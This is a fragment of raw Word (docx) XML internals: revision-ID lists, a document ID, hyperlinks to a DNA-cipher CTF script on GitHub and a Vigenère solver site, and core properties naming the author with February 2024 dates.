    <w:rsid w:val="00E87691"/>
    <w:rsid w:val="00E92043"/>
    <w:rsid w:val="00EA2B45"/>
    <w:rsid w:val="00EC2D68"/>
    <w:rsid w:val="00EC6047"/>
    <w:rsid w:val="00EC72DD"/>
    <w:rsid w:val="00ED0656"/>
    <w:rsid w:val="00ED5A92"/>
    <w:rsid w:val="00ED6E9A"/>
    <w:rsid w:val="00EE58EF"/>
    <w:rsid w:val="00EF72E7"/>
    <w:rsid w:val="00F17816"/>
    <w:rsid w:val="00F22C58"/>
    <w:rsid w:val="00F27FD9"/>
    <w:rsid w:val="00F420A9"/>
    <w:rsid w:val="00F50D4C"/>
    <w:rsid w:val="00F5330E"/>
    <w:rsid w:val="00F5748F"/>
    <w:rsid w:val="00F75FDF"/>
    <w:rsid w:val="00F8084A"/>
    <w:rsid w:val="00F82873"/>
    <w:rsid w:val="00F8329A"/>
    <w:rsid w:val="00F84417"/>
    <w:rsid w:val="00F84DCB"/>
    <w:rsid w:val="00F94B68"/>
    <w:rsid w:val="00FA640B"/>
    <w:rsid w:val="00FA696E"/>
    <w:rsid w:val="00FC372E"/>
    <w:rsid w:val="00FD1B81"/>
    <w:rsid w:val="00FE0B3C"/>
    <w:rsid w:val="00FE2203"/>
    <w:rsid w:val="00FF08F1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55A7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5910F5ED-FAA9-4FE7-87A8-E35BACD4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C72D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EC72D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A5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11E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1E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440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hyperlink" Target="https://github.com/karma9874/DNA-Cipher-Script-CTF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guballa.de/vigenere-solver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8376-173E-45BD-B7DE-3E19C79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浩 肖</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>锐浩 肖</cp:lastModifiedBy>
  <cp:revision>394</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-02-19T10:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-19T13:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>